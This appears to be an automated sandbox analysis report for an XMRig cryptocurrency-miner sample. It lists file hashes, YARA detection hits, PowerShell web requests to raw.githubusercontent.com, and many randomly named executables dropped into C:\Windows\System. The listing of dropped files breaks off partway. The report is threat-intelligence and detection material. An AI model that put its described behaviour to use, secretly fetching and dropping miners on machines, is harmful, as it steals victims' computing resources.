xmrig | 2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74

Analysis

max time kernel
149s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
08/06/2024, 21:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
Size

3.1MB
MD5

8c3374c59946a270b8308c98e33c17b4
SHA1

1ea6050aa3dbcd4833b5bfafd97865ee0924eabd
SHA256

2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74
SHA512

6ebb733ade8a777f0bba47433c88b6dcab7e495b93e8bc1b080638fcbb06d5532e5014d2a07e8701edc8cf5c8444233141fa932669bf87eef63ed26e00c42110
SSDEEP

98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWp:7bBeSFkt

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 64 IoCs

resource	yara_rule
behavioral2/memory/1624-0-0x00007FF7D54A0000-0x00007FF7D5896000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00080000000233c0-6.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c2-9.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c1-8.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1136-36-0x00007FF6C2D70000-0x00007FF6C3166000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c4-50.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233cb-56.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c8-64.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d2-103.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00080000000233d0-117.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2936-128-0x00007FF7F96D0000-0x00007FF7F9AC6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1964-138-0x00007FF637250000-0x00007FF637646000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3628-140-0x00007FF61F310000-0x00007FF61F706000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2108-144-0x00007FF7367C0000-0x00007FF736BB6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1876-147-0x00007FF69C740000-0x00007FF69CB36000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233e4-217.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233e3-216.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3624-242-0x00007FF690C50000-0x00007FF691046000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00080000000233cf-214.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233e2-212.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233e1-203.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233e0-202.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233df-199.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233de-196.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233dd-193.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233dc-190.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233db-185.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233da-182.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d9-179.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00080000000233be-162.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d8-157.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3088-153-0x00007FF788480000-0x00007FF788876000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4252-152-0x00007FF6FD260000-0x00007FF6FD656000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4532-151-0x00007FF77E340000-0x00007FF77E736000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2500-150-0x00007FF7128E0000-0x00007FF712CD6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4232-149-0x00007FF798940000-0x00007FF798D36000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1840-146-0x00007FF6E93F0000-0x00007FF6E97E6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1248-145-0x00007FF69D610000-0x00007FF69DA06000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1960-143-0x00007FF646230000-0x00007FF646626000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3028-142-0x00007FF7EA5C0000-0x00007FF7EA9B6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2228-141-0x00007FF6173C0000-0x00007FF6177B6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3380-139-0x00007FF787130000-0x00007FF787526000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d7-136.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4892-135-0x00007FF6A1C00000-0x00007FF6A1FF6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d6-133.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d5-131.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d4-129.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4472-127-0x00007FF61D300000-0x00007FF61D6F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d3-125.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3404-121-0x00007FF73CF80000-0x00007FF73D376000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1512-112-0x00007FF76E660000-0x00007FF76EA56000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233d1-109.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233ce-90.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233cd-88.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233ca-83.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233cc-80.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4056-63-0x00007FF73AB20000-0x00007FF73AF16000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c7-62.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c9-58.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1860-46-0x00007FF7975C0000-0x00007FF7979B6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c6-52.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c3-39.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x00070000000233c5-32.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1624-2414-0x00007FF7D54A0000-0x00007FF7D5896000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 64 IoCs

resource	yara_rule
behavioral2/memory/1624-0-0x00007FF7D54A0000-0x00007FF7D5896000-memory.dmp	UPX
behavioral2/files/0x00080000000233c0-6.dat	UPX
behavioral2/files/0x00070000000233c2-9.dat	UPX
behavioral2/files/0x00070000000233c1-8.dat	UPX
behavioral2/memory/1136-36-0x00007FF6C2D70000-0x00007FF6C3166000-memory.dmp	UPX
behavioral2/files/0x00070000000233c4-50.dat	UPX
behavioral2/files/0x00070000000233cb-56.dat	UPX
behavioral2/files/0x00070000000233c8-64.dat	UPX
behavioral2/files/0x00070000000233d2-103.dat	UPX
behavioral2/files/0x00080000000233d0-117.dat	UPX
behavioral2/memory/2936-128-0x00007FF7F96D0000-0x00007FF7F9AC6000-memory.dmp	UPX
behavioral2/memory/1964-138-0x00007FF637250000-0x00007FF637646000-memory.dmp	UPX
behavioral2/memory/3628-140-0x00007FF61F310000-0x00007FF61F706000-memory.dmp	UPX
behavioral2/memory/2108-144-0x00007FF7367C0000-0x00007FF736BB6000-memory.dmp	UPX
behavioral2/memory/1876-147-0x00007FF69C740000-0x00007FF69CB36000-memory.dmp	UPX
behavioral2/files/0x00070000000233e4-217.dat	UPX
behavioral2/files/0x00070000000233e3-216.dat	UPX
behavioral2/memory/3624-242-0x00007FF690C50000-0x00007FF691046000-memory.dmp	UPX
behavioral2/files/0x00080000000233cf-214.dat	UPX
behavioral2/files/0x00070000000233e2-212.dat	UPX
behavioral2/files/0x00070000000233e1-203.dat	UPX
behavioral2/files/0x00070000000233e0-202.dat	UPX
behavioral2/files/0x00070000000233df-199.dat	UPX
behavioral2/files/0x00070000000233de-196.dat	UPX
behavioral2/files/0x00070000000233dd-193.dat	UPX
behavioral2/files/0x00070000000233dc-190.dat	UPX
behavioral2/files/0x00070000000233db-185.dat	UPX
behavioral2/files/0x00070000000233da-182.dat	UPX
behavioral2/files/0x00070000000233d9-179.dat	UPX
behavioral2/files/0x00080000000233be-162.dat	UPX
behavioral2/files/0x00070000000233d8-157.dat	UPX
behavioral2/memory/3088-153-0x00007FF788480000-0x00007FF788876000-memory.dmp	UPX
behavioral2/memory/4252-152-0x00007FF6FD260000-0x00007FF6FD656000-memory.dmp	UPX
behavioral2/memory/4532-151-0x00007FF77E340000-0x00007FF77E736000-memory.dmp	UPX
behavioral2/memory/2500-150-0x00007FF7128E0000-0x00007FF712CD6000-memory.dmp	UPX
behavioral2/memory/4232-149-0x00007FF798940000-0x00007FF798D36000-memory.dmp	UPX
behavioral2/memory/1840-146-0x00007FF6E93F0000-0x00007FF6E97E6000-memory.dmp	UPX
behavioral2/memory/1248-145-0x00007FF69D610000-0x00007FF69DA06000-memory.dmp	UPX
behavioral2/memory/1960-143-0x00007FF646230000-0x00007FF646626000-memory.dmp	UPX
behavioral2/memory/3028-142-0x00007FF7EA5C0000-0x00007FF7EA9B6000-memory.dmp	UPX
behavioral2/memory/2228-141-0x00007FF6173C0000-0x00007FF6177B6000-memory.dmp	UPX
behavioral2/memory/3380-139-0x00007FF787130000-0x00007FF787526000-memory.dmp	UPX
behavioral2/files/0x00070000000233d7-136.dat	UPX
behavioral2/memory/4892-135-0x00007FF6A1C00000-0x00007FF6A1FF6000-memory.dmp	UPX
behavioral2/files/0x00070000000233d6-133.dat	UPX
behavioral2/files/0x00070000000233d5-131.dat	UPX
behavioral2/files/0x00070000000233d4-129.dat	UPX
behavioral2/memory/4472-127-0x00007FF61D300000-0x00007FF61D6F6000-memory.dmp	UPX
behavioral2/files/0x00070000000233d3-125.dat	UPX
behavioral2/memory/3404-121-0x00007FF73CF80000-0x00007FF73D376000-memory.dmp	UPX
behavioral2/memory/1512-112-0x00007FF76E660000-0x00007FF76EA56000-memory.dmp	UPX
behavioral2/files/0x00070000000233d1-109.dat	UPX
behavioral2/files/0x00070000000233ce-90.dat	UPX
behavioral2/files/0x00070000000233cd-88.dat	UPX
behavioral2/files/0x00070000000233ca-83.dat	UPX
behavioral2/files/0x00070000000233cc-80.dat	UPX
behavioral2/memory/4056-63-0x00007FF73AB20000-0x00007FF73AF16000-memory.dmp	UPX
behavioral2/files/0x00070000000233c7-62.dat	UPX
behavioral2/files/0x00070000000233c9-58.dat	UPX
behavioral2/memory/1860-46-0x00007FF7975C0000-0x00007FF7979B6000-memory.dmp	UPX
behavioral2/files/0x00070000000233c6-52.dat	UPX
behavioral2/files/0x00070000000233c3-39.dat	UPX
behavioral2/files/0x00070000000233c5-32.dat	UPX
behavioral2/memory/1624-2414-0x00007FF7D54A0000-0x00007FF7D5896000-memory.dmp	UPX

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/1624-0-0x00007FF7D54A0000-0x00007FF7D5896000-memory.dmp	xmrig
behavioral2/files/0x00080000000233c0-6.dat	xmrig
behavioral2/files/0x00070000000233c2-9.dat	xmrig
behavioral2/files/0x00070000000233c1-8.dat	xmrig
behavioral2/memory/1136-36-0x00007FF6C2D70000-0x00007FF6C3166000-memory.dmp	xmrig
behavioral2/files/0x00070000000233c4-50.dat	xmrig
behavioral2/files/0x00070000000233cb-56.dat	xmrig
behavioral2/files/0x00070000000233c8-64.dat	xmrig
behavioral2/files/0x00070000000233d2-103.dat	xmrig
behavioral2/files/0x00080000000233d0-117.dat	xmrig
behavioral2/memory/2936-128-0x00007FF7F96D0000-0x00007FF7F9AC6000-memory.dmp	xmrig
behavioral2/memory/1964-138-0x00007FF637250000-0x00007FF637646000-memory.dmp	xmrig
behavioral2/memory/3628-140-0x00007FF61F310000-0x00007FF61F706000-memory.dmp	xmrig
behavioral2/memory/2108-144-0x00007FF7367C0000-0x00007FF736BB6000-memory.dmp	xmrig
behavioral2/memory/1876-147-0x00007FF69C740000-0x00007FF69CB36000-memory.dmp	xmrig
behavioral2/files/0x00070000000233e4-217.dat	xmrig
behavioral2/files/0x00070000000233e3-216.dat	xmrig
behavioral2/memory/3624-242-0x00007FF690C50000-0x00007FF691046000-memory.dmp	xmrig
behavioral2/files/0x00080000000233cf-214.dat	xmrig
behavioral2/files/0x00070000000233e2-212.dat	xmrig
behavioral2/files/0x00070000000233e1-203.dat	xmrig
behavioral2/files/0x00070000000233e0-202.dat	xmrig
behavioral2/files/0x00070000000233df-199.dat	xmrig
behavioral2/files/0x00070000000233de-196.dat	xmrig
behavioral2/files/0x00070000000233dd-193.dat	xmrig
behavioral2/files/0x00070000000233dc-190.dat	xmrig
behavioral2/files/0x00070000000233db-185.dat	xmrig
behavioral2/files/0x00070000000233da-182.dat	xmrig
behavioral2/files/0x00070000000233d9-179.dat	xmrig
behavioral2/files/0x00080000000233be-162.dat	xmrig
behavioral2/files/0x00070000000233d8-157.dat	xmrig
behavioral2/memory/3088-153-0x00007FF788480000-0x00007FF788876000-memory.dmp	xmrig
behavioral2/memory/4252-152-0x00007FF6FD260000-0x00007FF6FD656000-memory.dmp	xmrig
behavioral2/memory/4532-151-0x00007FF77E340000-0x00007FF77E736000-memory.dmp	xmrig
behavioral2/memory/2500-150-0x00007FF7128E0000-0x00007FF712CD6000-memory.dmp	xmrig
behavioral2/memory/4232-149-0x00007FF798940000-0x00007FF798D36000-memory.dmp	xmrig
behavioral2/memory/1840-146-0x00007FF6E93F0000-0x00007FF6E97E6000-memory.dmp	xmrig
behavioral2/memory/1248-145-0x00007FF69D610000-0x00007FF69DA06000-memory.dmp	xmrig
behavioral2/memory/1960-143-0x00007FF646230000-0x00007FF646626000-memory.dmp	xmrig
behavioral2/memory/3028-142-0x00007FF7EA5C0000-0x00007FF7EA9B6000-memory.dmp	xmrig
behavioral2/memory/2228-141-0x00007FF6173C0000-0x00007FF6177B6000-memory.dmp	xmrig
behavioral2/memory/3380-139-0x00007FF787130000-0x00007FF787526000-memory.dmp	xmrig
behavioral2/files/0x00070000000233d7-136.dat	xmrig
behavioral2/memory/4892-135-0x00007FF6A1C00000-0x00007FF6A1FF6000-memory.dmp	xmrig
behavioral2/files/0x00070000000233d6-133.dat	xmrig
behavioral2/files/0x00070000000233d5-131.dat	xmrig
behavioral2/files/0x00070000000233d4-129.dat	xmrig
behavioral2/memory/4472-127-0x00007FF61D300000-0x00007FF61D6F6000-memory.dmp	xmrig
behavioral2/files/0x00070000000233d3-125.dat	xmrig
behavioral2/memory/3404-121-0x00007FF73CF80000-0x00007FF73D376000-memory.dmp	xmrig
behavioral2/memory/1512-112-0x00007FF76E660000-0x00007FF76EA56000-memory.dmp	xmrig
behavioral2/files/0x00070000000233d1-109.dat	xmrig
behavioral2/files/0x00070000000233ce-90.dat	xmrig
behavioral2/files/0x00070000000233cd-88.dat	xmrig
behavioral2/files/0x00070000000233ca-83.dat	xmrig
behavioral2/files/0x00070000000233cc-80.dat	xmrig
behavioral2/memory/4056-63-0x00007FF73AB20000-0x00007FF73AF16000-memory.dmp	xmrig
behavioral2/files/0x00070000000233c7-62.dat	xmrig
behavioral2/files/0x00070000000233c9-58.dat	xmrig
behavioral2/memory/1860-46-0x00007FF7975C0000-0x00007FF7979B6000-memory.dmp	xmrig
behavioral2/files/0x00070000000233c6-52.dat	xmrig
behavioral2/files/0x00070000000233c3-39.dat	xmrig
behavioral2/files/0x00070000000233c5-32.dat	xmrig
behavioral2/memory/1624-2414-0x00007FF7D54A0000-0x00007FF7D5896000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

flow	pid	Process
9	3584	powershell.exe
11	3584	powershell.exe
13	3584	powershell.exe
14	3584	powershell.exe
16	3584	powershell.exe
17	3584	powershell.exe
18	3584	powershell.exe
23	3584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3584	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1136	mPipOEn.exe
1860	gEIZzEK.exe
4056	fjGKxEN.exe
1512	CaXmbcR.exe
3404	YjTqmci.exe
4472	ZtEKeJs.exe
2936	llZiQdb.exe
4232	BNCeRRD.exe
2500	GHjVyZk.exe
4892	umHhpZH.exe
1964	XCxjzWF.exe
3380	WWYgyLJ.exe
3628	SbarBUP.exe
4532	xXQcoRn.exe
2228	dKSbVgA.exe
3028	dbprcMB.exe
1960	CTpLeaJ.exe
2108	CehghiH.exe
1248	wAAWPxu.exe
4252	ZJyMaKm.exe
1840	SnjNxZK.exe
1876	EqqkvDc.exe
3088	RTcxBOT.exe
3624	zvEWRgk.exe
1656	VvQJWcr.exe
1280	HabaOsT.exe
5048	FguqZzv.exe
1740	paHiYGT.exe
2432	PbrCCEq.exe
2412	IzDOqIg.exe
1252	BAqTjYg.exe
3436	xWQfmRC.exe
4752	WlJLSmI.exe
5060	sckqFGQ.exe
1728	VryqGLZ.exe
3440	psoYkCP.exe
2392	CHXRWEk.exe
3520	vGUsriA.exe
924	SGeRiSx.exe
3832	mnVKtom.exe
5032	weYnmTl.exe
4556	YCcgLVL.exe
3096	nsVVtGy.exe
3528	TGKcrOj.exe
4876	eRyOSfz.exe
4240	PmkTboP.exe
1996	ZuObhrE.exe
1768	XQrSUvZ.exe
2416	IqiFUnI.exe
4628	vtQklxl.exe
1972	lRvriWz.exe
1440	nkqjeNE.exe
1352	FDRtFMv.exe
3460	ZQzWhwu.exe
3360	FvrtmoY.exe
2364	xRBluBr.exe
4452	DLaKVxJ.exe
4536	tZFmThF.exe
4620	jiemoPp.exe
1620	XzhDYBW.exe
1648	sDnQUxi.exe
3972	dyabLVi.exe
752	kxIGAyq.exe
3256	HMIITvx.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1624-0-0x00007FF7D54A0000-0x00007FF7D5896000-memory.dmp	upx
behavioral2/files/0x00080000000233c0-6.dat	upx
behavioral2/files/0x00070000000233c2-9.dat	upx
behavioral2/files/0x00070000000233c1-8.dat	upx
behavioral2/memory/1136-36-0x00007FF6C2D70000-0x00007FF6C3166000-memory.dmp	upx
behavioral2/files/0x00070000000233c4-50.dat	upx
behavioral2/files/0x00070000000233cb-56.dat	upx
behavioral2/files/0x00070000000233c8-64.dat	upx
behavioral2/files/0x00070000000233d2-103.dat	upx
behavioral2/files/0x00080000000233d0-117.dat	upx
behavioral2/memory/2936-128-0x00007FF7F96D0000-0x00007FF7F9AC6000-memory.dmp	upx
behavioral2/memory/1964-138-0x00007FF637250000-0x00007FF637646000-memory.dmp	upx
behavioral2/memory/3628-140-0x00007FF61F310000-0x00007FF61F706000-memory.dmp	upx
behavioral2/memory/2108-144-0x00007FF7367C0000-0x00007FF736BB6000-memory.dmp	upx
behavioral2/memory/1876-147-0x00007FF69C740000-0x00007FF69CB36000-memory.dmp	upx
behavioral2/files/0x00070000000233e4-217.dat	upx
behavioral2/files/0x00070000000233e3-216.dat	upx
behavioral2/memory/3624-242-0x00007FF690C50000-0x00007FF691046000-memory.dmp	upx
behavioral2/files/0x00080000000233cf-214.dat	upx
behavioral2/files/0x00070000000233e2-212.dat	upx
behavioral2/files/0x00070000000233e1-203.dat	upx
behavioral2/files/0x00070000000233e0-202.dat	upx
behavioral2/files/0x00070000000233df-199.dat	upx
behavioral2/files/0x00070000000233de-196.dat	upx
behavioral2/files/0x00070000000233dd-193.dat	upx
behavioral2/files/0x00070000000233dc-190.dat	upx
behavioral2/files/0x00070000000233db-185.dat	upx
behavioral2/files/0x00070000000233da-182.dat	upx
behavioral2/files/0x00070000000233d9-179.dat	upx
behavioral2/files/0x00080000000233be-162.dat	upx
behavioral2/files/0x00070000000233d8-157.dat	upx
behavioral2/memory/3088-153-0x00007FF788480000-0x00007FF788876000-memory.dmp	upx
behavioral2/memory/4252-152-0x00007FF6FD260000-0x00007FF6FD656000-memory.dmp	upx
behavioral2/memory/4532-151-0x00007FF77E340000-0x00007FF77E736000-memory.dmp	upx
behavioral2/memory/2500-150-0x00007FF7128E0000-0x00007FF712CD6000-memory.dmp	upx
behavioral2/memory/4232-149-0x00007FF798940000-0x00007FF798D36000-memory.dmp	upx
behavioral2/memory/1840-146-0x00007FF6E93F0000-0x00007FF6E97E6000-memory.dmp	upx
behavioral2/memory/1248-145-0x00007FF69D610000-0x00007FF69DA06000-memory.dmp	upx
behavioral2/memory/1960-143-0x00007FF646230000-0x00007FF646626000-memory.dmp	upx
behavioral2/memory/3028-142-0x00007FF7EA5C0000-0x00007FF7EA9B6000-memory.dmp	upx
behavioral2/memory/2228-141-0x00007FF6173C0000-0x00007FF6177B6000-memory.dmp	upx
behavioral2/memory/3380-139-0x00007FF787130000-0x00007FF787526000-memory.dmp	upx
behavioral2/files/0x00070000000233d7-136.dat	upx
behavioral2/memory/4892-135-0x00007FF6A1C00000-0x00007FF6A1FF6000-memory.dmp	upx
behavioral2/files/0x00070000000233d6-133.dat	upx
behavioral2/files/0x00070000000233d5-131.dat	upx
behavioral2/files/0x00070000000233d4-129.dat	upx
behavioral2/memory/4472-127-0x00007FF61D300000-0x00007FF61D6F6000-memory.dmp	upx
behavioral2/files/0x00070000000233d3-125.dat	upx
behavioral2/memory/3404-121-0x00007FF73CF80000-0x00007FF73D376000-memory.dmp	upx
behavioral2/memory/1512-112-0x00007FF76E660000-0x00007FF76EA56000-memory.dmp	upx
behavioral2/files/0x00070000000233d1-109.dat	upx
behavioral2/files/0x00070000000233ce-90.dat	upx
behavioral2/files/0x00070000000233cd-88.dat	upx
behavioral2/files/0x00070000000233ca-83.dat	upx
behavioral2/files/0x00070000000233cc-80.dat	upx
behavioral2/memory/4056-63-0x00007FF73AB20000-0x00007FF73AF16000-memory.dmp	upx
behavioral2/files/0x00070000000233c7-62.dat	upx
behavioral2/files/0x00070000000233c9-58.dat	upx
behavioral2/memory/1860-46-0x00007FF7975C0000-0x00007FF7979B6000-memory.dmp	upx
behavioral2/files/0x00070000000233c6-52.dat	upx
behavioral2/files/0x00070000000233c3-39.dat	upx
behavioral2/files/0x00070000000233c5-32.dat	upx
behavioral2/memory/1624-2414-0x00007FF7D54A0000-0x00007FF7D5896000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\EuJASFg.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\NYXNaVb.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\jqlSxNV.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\aASAhAC.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\bqCbVOO.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\HypHwRJ.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\gcRhVVN.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\oXAmDeO.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\MaRkFoI.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\SYhxZyp.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\OBFHHpB.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\yYEOQUs.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\dyLzYVI.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\bZzUeIJ.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\DXbRlVI.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\SbarBUP.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\HARQwro.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\mgNaASo.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\PSXdnlR.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\yKCqQrV.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\LhRVeGa.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\zIhUyNu.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\epqOVqQ.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\BvFqIxY.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\SDXzues.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\SWHUgtu.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\XyzEgLB.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\nIIknsa.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\dyCopju.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\azQCuDT.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\LipaaUe.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\UCGRQJf.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\PxXTHbj.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\jiokHjj.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\eOMMfGz.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\aRtEIOw.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
